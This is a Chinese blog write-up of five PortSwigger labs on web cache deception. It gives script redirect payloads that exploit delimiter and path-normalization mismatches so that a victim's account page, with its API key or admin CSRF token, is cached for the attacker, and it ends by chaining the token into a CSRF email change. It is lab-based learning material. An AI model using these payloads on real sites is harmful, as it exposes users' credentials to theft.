【缓存欺骗-专题】

已于 2024-10-12 00:05:51 修改
阅读量504 收藏 5
点赞数 2
CC 4.0 BY-SA版权
文章标签: 缓存
于 2024-10-08 14:45:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/asmartrman/article/details/142758511

缓存欺骗-专题

Burpsuit靶场

Exploiting path mapping for web cache deception

API KEY所在路径为

https://YOUR-LAB-ID.web-security-academy.net/my-account/

在这里插入图片描述

所以需要将受害者的目标网页缓存到服务器中,构造如下POC

<script>document.location="https://YOUR-LAB-ID.web-security-academy.net/my-account/test.js"</script>

将其发送给受害者,受害者会被定向到https://YOUR-LAB-ID.web-security-academy.net/my-account/test.js,由于test.js不存在,通过缓存欺骗,会讲受害者的/my-account路径下信息缓存进test.js,他人访问时就能看到受害者的APIKEY
在这里插入图片描述
发送后访问发送给受害者的链接
在这里插入图片描述

Lab: Exploiting path delimiters for web cache deception

这题其实就是将;作为路径分隔符,也就是POC

<script>document.location="https://YOUR-LAB-ID.web-security-academy.net/my-account;test.js"</script>

但是始终无法复现,无法击中缓存,不知道是不是服务器问题。(已解决)
需发送两次POC给受害者,两次点击后X-Cache会变成HIT状态,访问即可
在这里插入图片描述

Lab: Exploiting origin server normalization for web cache deception

观察发现,所有js文件都保存在resource文件夹下
在这里插入图片描述
同时,请求resource文件夹下的文件,观察数据包会发现命中缓存
在这里插入图片描述
可以知道,访问resource下的文件会触发缓存,所以我们可以用/resource目录进行穿越写入缓存到resource目录下,即
/resources/..%2Fmy-account
完整POC

<script>document.location="https://YOUR-LAB-ID.web-security-academy.net/resources/..%2Fmy-account?wcd"</script>

在这里插入图片描述
末尾的?wcd只是为了和测试时的缓存区分,但访问仍是miss
在这里插入图片描述
没有命中缓存,不知道是否是服务器问题。(已解决)
经过测试,最好发送两次POC到服务端,将X-Cache变为HIT状态
在这里插入图片描述

Lab: Exploiting cache server normalization for web cache deception

经过测试发现,/resources目录下文件都能够触发缓存
在这里插入图片描述
但我们使用/resources/../my-account时发现无法触发缓存
在这里插入图片描述
/resources/%2e%2e%2fmy-account同样无法触发缓存
在这里插入图片描述
所以猜测缓存服务器首先解码编码的文本,然后发生目录遍历,最后应用缓存规则。通过/my-account/%2e%2e%2fresources可以证实
在这里插入图片描述
但是这样的方法无法获取/my-account下的内容,所以我们需要在源服务器端使my-account后的路径失效,但在缓存服务器不能失效。也就是说我们需要一个缓存服务器无法识别但可以在源服务器/后端服务器上解释的函数。
爆破发现只有四个特殊字符可以造成截断:

%3f、?%23#

而其中只有%23和#不会被缓存服务器处理,可以触发缓存
在这里插入图片描述
所以向受害者发送以下POC

<script>document.location="https://0af200cf0434e279a9ecb9b300a6003d.web-security-academy.net/my-account%23/%2e%2e%2fresources"</script>

在这里插入图片描述
成功
在这里插入图片描述
注意这里不能使用#因为在发送HTTP请求时,浏览器将忽略#后面的内容,所以缓存服务器收到的内容也没有resources,显然是不行的。

Lab: Exploiting exact-match cache rules for web cache deception

这里我们发现数据都没有触发缓存,只有/robotx.txt能够触发缓存。所以和上题的思路一样,让缓存服务器识别到/robots.txt,让源服务器识别到/my-account
首先测试缓存服务器的缓存规则
在这里插入图片描述
命中缓存,证明缓存服务器先解码,然后进行缓存,接下来测试识别的分隔符,测试发现,缓存浏览器无法正确处理以下分隔符

%23 # ;

接下来测试源服务器适用哪个分隔符,测试发现使用;进行隔断可以正常识别到my-account
在这里插入图片描述
构造POC如下

<script>document.location="https://0ab4001e035d392882517a50008a0075.web-security-academy.net/my-account;%2f%2e%2e%2frobots.txt"</script>

发送给受害者后获得管理员csrftoken
在这里插入图片描述

修改email抓包,修改数据包中的csrf参数,生成POC发送给受害者
在这里插入图片描述

Wine_Jar
关注
【网络安全 | 漏洞挖掘】Web缓存欺骗攻击原理及攻防实战
等风来
01-10 3567
缓存的意义在于实现资源的快速访问,在Web程序中就使用了网络缓存功能,如CDN、负载均衡器及反向代理。为了实现快速访问,同时保证数据安全,可将一些静态的、公共的、不敏感的文件缓存在服务器,而一些动态的、敏感的文件则不应缓存
牛客网-精华专题-前端校招面试题目合集
qq_41254204的博客
02-01 3125
前端校招面试题目合集 501HTML HTML 浏览器页面有哪三层构成,分别是什么,作用是什么? 构成:结构层(structural layer)、表示层(presentation layer)、行为层 (behavior layer) 分别是:HTML、CSS、JavaScript 作用:HTML实现页面结构,CSS完成页面的表现与风格,JavaScript实现一些客户端的功能与业务 H...
PortSwigger WEB缓存欺骗
weixin_42451330的博客
11-16 1268
本文介绍了 PortSwigger 靶场的WEB缓存欺骗,给出了常见的web缓存欺骗利用姿势及发防范措施。
web缓存欺骗
balance的博客
08-06 397
前言 是否遇到过,打开登录过的某网站,出现的却是别人的信息? 是否被要求过接口返回的手机号要用星号打码? 如果网站被黑客用缓存攻击,就可能展示的是别人的信息;若返回的手机号被打码,那泄露的这些信息就没那么大的影响 什么是web缓存欺骗 缓存是很多网站都会开启的,可以减少网络传输,提升用户体验等等 但若缓存和服务器的配置存在如下情况,则有可能被攻击 1、攻击者登录过example.com网站,然后打开http://www.example.com/home.php/non-existent..
web缓存欺骗攻击
BetsyMyGirl的博客
12-09 5605
一文弄懂缓存欺骗攻击漏洞
关于缓存欺骗的小总结
zkaqlaoniao的博客
03-19 1175
缓存欺骗是一种相对较新的网络安全攻击向量,通过诱骗网络服务器将私密内容存储在公共缓存中,从而导致敏感信息的泄露。如果该漏洞被利用,攻击者可以绕过身份验证机制,获取个人或机密数据。本文将深入探讨缓存欺骗的概念、工作原理、利用方法以及最重要的防护措施。在深入探讨缓存欺骗之前,有必要了解缓存的概念以及它在 Web 开发和网络中的作用。什么是缓存缓存是一种临时存储位置,用于保存数据或文件的副本,以便加快访问速度。
专题资料(2021-2022年)Quidway S6700 系列交换机V100R006产品彩页 V10.docx
10-07
2. **强大的缓存能力和缓存调度**:针对大数据流量场景,S6700交换机配备了大容量缓存,通过先进的缓存调度机制,保证了设备在高流量下的高效运行,避免了数据拥塞。 3. **完善的安全控制策略**:S6700提供了丰富的...
翻译+笔记:web缓存投毒
m0_65129142的博客
12-15 1113
Introduction to web cache poisoning 写在开头:具体实践还是要做题。题目没有刷到这个专题,先做阅读了解。 英语水平有限,翻译欠佳,请各位多多包涵。也欢迎指正。 web caching 和客户端缓存类似,客户端缓存:暂时地保存图片到本地,下次访问便会很快。 内容交付链下, web服务器,中间系统,内容交付网络(CNDs)都被用于web缓存,以应对多个客户端请求(无需每次建索原始内容)。有利于负载均衡。 如图,左边为client,中间为caching server,最右为web
Linux小测03-HTTP专题
weixin_43264873的博客
04-04 2619
HTTP 1.文件传输协议是:FTP协议。 SMTP是简单邮件传送协议(Simple Mail Transfer Protocol) FTP是文件传输协议(File Transfer Protocol) UDP是用户数据报协议(User Datagram Protocol) TELNET是远程终端访问协议 (Telecommunication Network) 2.以下关于HTTP协议叙述正确的是...
红队专题-与维持隐匿Privilege Escalation
aming小老弟
10-27 1629
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
缓存欺骗原理
weixin_44843084的博客
06-19 327
实现攻击的一个条件是应用程序对现有的URL请求的解释,在最后添加一个不存在的文件的名称,如http://www.example.com/home.php/nonexistent.css,最后将返回http://www.example.com/home.php 攻击原理概述 未经过身份验证的攻击者可以轻松的利用此漏洞,攻击步骤如下面所示: 1.攻击者诱使已经登录的用户访问https://www.bank.com/account.do/logo.png。 2.受害者的浏览器请求https://www.bank.
杰奇 缓存漏洞_缓存欺骗:我如何在Medium中发现漏洞并帮助他们修复它
cumian9828的博客
08-03 772
杰奇 缓存漏洞by Yuval Shprinz 由Yuval Shprinz 缓存欺骗:我如何在Medium中发现漏洞并帮助他们修复它 (Cache Deception: How I discovered a vulnerability in Medium and helped them fix it) In my previous post, I tried to demonstrate h...
PortSwigger——web cache deception
qq_55202378的博客
02-10 898
内容交付网络(Content Delivery Networks,CDN)就是缓存技术,CDN使用缓存将内容的副本存储在世界各地的分布式服务器上,通过从最接近用户的服务器提供内容来加速交付,通过最小化数据传输距离来减少加载时间。另一些则首先根据编码的URL应用缓存规则,然后解码URL并将其转发到下一个服务器,这些行为还可能导致缓存和源服务器解释URL路径的方式不一致。请注意,这只表明资源是可缓存的。如果传入请求的缓存键与前一个请求的缓存键匹配,则该高速缓存认为它们是等价的,并提供缓存响应的副本。
论文阅读:Cached and Confused: Web Cache Deception in the wild
qq_39378221的博客
04-19 1014
文章目录1 背景1.1 web缓存1.2 路径混淆1.3 web缓存欺骗2 WCD攻击测量方法2.1 第一阶段:测量设置2.1.1 域名发现2.1.2 账号创建2.1.3 Cookie收集2.2 第二阶段:攻击面检测2.3 第三阶段:WCD检测3 WCD测量分析3.1 WCD漏洞在流行网站中的存在情况3.2 WCD漏洞是否会暴露以及会暴露何种PII3.3 WCD漏洞是否可以击败针对web应用程序攻击的防御3.4 WCD漏洞是否会被未认证用户利用4 路径混淆变种5 Empirical Experiments6
Web缓存欺骗攻击
Q1n6
09-04 3325
原文地址: http://www.4hou.com/technology/7523.html 前言 Omer Gil早在今年年初就在他的博客上发表了有关于Web缓存欺骗攻击技术的博文,随后他在BlackHat USA 2017 和 BSides Tel-Aviv 2017 上对这种攻击技术进行了演示,并做了更深入的研究。 在他发布的“Web 缓存欺骗技术白皮书”中,详细的介
`customRef` 在实战中的使用:防抖、计算属性缓存和异步数据获取
你若盛开,清风自来
06-21 368
Vue3的customRef机制详解:自定义响应式引用的创建与应用 摘要:customRef是Vue3提供的高级响应式API,允许开发者创建可完全控制依赖追踪和更新触发的自定义引用。主要应用于三大场景:1)实现输入框防抖/节流;2)构建带缓存的计算属性;3)管理异步数据响应。通过示例代码展示了如何实现500毫秒防抖的输入框、自动缓存的计算属性以及异步数据获取的响应式处理。该特性赋予开发者更精细的响应式控制能力,特别适合需要定制化响应逻辑的复杂场景。(149字)
Spring Boot 工程启动以后,我希望将数据库中已有的固定内容,打入到 Redis 缓存中,请问如何处理?
篱笆院的狗的博客
06-19 487
Spring Boot项目中可以通过配置Redis和数据库连接,实现将数据库固定内容预加载到Redis缓存。步骤如下:1)添加Spring Data Redis和数据库驱动依赖;2)配置数据库和Redis连接信息;3)创建实体类和JPA Repository;4)编写服务类在应用启动时从数据库读取数据并存入Redis;5)配置RedisTemplate序列化方式。需注意大数据量时的分批处理、缓存更新机制及合适的序列化方案。这种方法可以有效提升系统性能。
【笔记】解决部署国产AI Agent 开源项目 MiniMax-M1时 Hugging Face 模型下载缓存占满 C 盘问题:更改缓存位置全流程
love530love的博客
06-20 740
解决部署国产AI Agent 开源项目 MiniMax-M1时 Hugging Face 模型下载缓存占满 C 盘问题:更改缓存位置全流程
Agent成本降低46%:缓存规划器的思路模板
最新发布
qq_36671160的博客
06-22 648
成本减半,性能保持97%的 Agent 缓存架构
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值